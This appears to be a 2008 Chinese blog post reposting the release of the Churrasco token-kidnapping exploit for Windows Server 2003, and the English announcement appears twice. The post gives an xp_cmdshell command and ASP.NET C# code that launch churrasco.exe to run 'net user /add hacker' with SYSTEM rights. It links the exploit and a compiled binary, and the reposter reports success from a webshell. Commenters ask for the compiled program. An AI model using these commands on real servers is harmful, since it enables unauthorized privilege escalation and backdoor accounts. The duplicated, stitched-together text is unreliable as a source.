微点主动防御(version20081008)及以下本地权限提升漏洞(user权限下绕过UAC、主动防御)
“中国最牛政府网站”蹿红网络
October 9, 2008 12:40 | by
It has been a long time since Token Kidnapping presentation (http://www.argeniss.com/research/TokenKidnapping.pdf)
was published so I decided to release a PoC exploit for Win2k3 that alows to execute code under SYSTEM account.
Basically if you can run code under any service in Win2k3 then you can own Windows, this is because Windows services accounts can impersonate. Other process (not services) that can impersonate are IIS 6 worker processes so if you can run code from an ASP .NET or classic ASP web application then you can own Windows too. If you provide shared hosting services then I would recomend to not allow users to run this kind of code from ASP.
-SQL Server is a nice target for the exploit if you are a DBA and want to own Windows:
-Exploiting IIS 6 with ASP .NET :
...
System.Diagnostics.Process myP = new System.Diagnostics.Process();
myP.StartInfo.RedirectStandardOutput = true;
myP.StartInfo.FileName=Server.MapPath("churrasco.exe");
myP.StartInfo.UseShellExecute = false;
myP.StartInfo.Arguments= " \"net user /add hacker\" ";
myP.Start();
string output = myP.StandardOutput.ReadToEnd();
Response.Write(output);
...
You can find the PoC exploit here http://www.argeniss.com/research/Churrasco.zip
backup link: http://milw0rm.com/sploits/2008-Churrasco.zip
Enjoy.
Cesar.
冷漠 PS: 我在虚拟机上测试成功 ,环境为 windows 2003_sp1 全补丁 ,在 .NET 也就是 User 权限下,能够成功执行系统命令,非常强大啊··截图如下:
更新 : 据朋友测试,在 asp 木马下 也可以成功提权,就是说 在guest 下 也可以执行系统命令,但是需要 .NET 的支持···
Code下载:
Download ( 732 downloads)
编译好的EXP:
Download ( 769 downloads)
was published so I decided to release a PoC exploit for Win2k3 that alows to execute code under SYSTEM account.
Basically if you can run code under any service in Win2k3 then you can own Windows, this is because Windows services accounts can impersonate. Other process (not services) that can impersonate are IIS 6 worker processes so if you can run code from an ASP .NET or classic ASP web application then you can own Windows too. If you provide shared hosting services then I would recomend to not allow users to run this kind of code from ASP.
-SQL Server is a nice target for the exploit if you are a DBA and want to own Windows:
exec xp_cmdshell 'churrasco "net user /add hacker"'
-Exploiting IIS 6 with ASP .NET :
...
System.Diagnostics.Process myP = new System.Diagnostics.Process();
myP.StartInfo.RedirectStandardOutput = true;
myP.StartInfo.FileName=Server.MapPath("churrasco.exe");
myP.StartInfo.UseShellExecute = false;
myP.StartInfo.Arguments= " \"net user /add hacker\" ";
myP.Start();
string output = myP.StandardOutput.ReadToEnd();
Response.Write(output);
...
You can find the PoC exploit here http://www.argeniss.com/research/Churrasco.zip
backup link: http://milw0rm.com/sploits/2008-Churrasco.zip
Enjoy.
Cesar.
冷漠 PS: 我在虚拟机上测试成功 ,环境为 windows 2003_sp1 全补丁 ,在 .NET 也就是 User 权限下,能够成功执行系统命令,非常强大啊··截图如下:
更新 : 据朋友测试,在 asp 木马下 也可以成功提权,就是说 在guest 下 也可以执行系统命令,但是需要 .NET 的支持···
Code下载:
Download ( 732 downloads)编译好的EXP:
Download ( 769 downloads)
MK2
October 9, 2008 17:25
好东西.发一个编释好的程序吧....
!4p47hy replied on October 11, 2008 13:19
已经发上来了· ·
Pages: 1/1 
1 
1
